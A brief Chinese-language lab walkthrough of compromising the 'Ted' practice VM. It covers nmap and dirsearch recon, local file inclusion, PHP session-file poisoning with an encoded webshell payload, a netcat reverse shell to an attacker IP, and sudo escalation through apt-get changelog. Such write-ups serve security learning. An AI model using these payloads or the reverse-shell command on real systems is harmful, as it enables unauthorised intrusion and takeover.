Ted靶机设置
靶机设置
设置靶机为NAT模式
靶机IP发现
nmap 192.168.112.0/24
靶机ip为192.168.112.144
目录扫描
dirsearch 192.168.112.144
访问浏览器
尝试弱口令登陆,发现失败
BP抓包查看
发现需要hash加密
对admin进行hash加密
转化大写后8C6976E5B5410415BDE908BD4DEE15DFB167A9C873FC4BB8A81F6F2AB448A918
登陆成功
文件包含
尝试提交 ../../../../../../../../etc/passwd
发现存在文件包含漏洞
尝试包含用来存储用户session的文件,从而获取shell
抓取一个有session的请求包,拿到session
phpsessid:peuds21gpjljvnbk5hb6udq6j2
搜索框输入
/var/lib/php/sessions/sess_peuds21gpjljvnbk5hb6udq6j2
getshell
测试RCE是否存在
修改user pref:%3C%3Fphp%20system(%24_POST%5B%22cmd%22%5D)%3B%20%3F%3E
发现命令成功执行
开启监听
写入反弹shell
nc+192.168.112.130+9999+-e+/bin/bash
监听成功,拿到shell
提权
生成交互式shell
python3 -c 'import pty;pty.spawn("/bin/bash")'
sudo -l查看免密操作
尝试sudo提权
sudo apt-get changelog apt
!/bin/sh
提权成功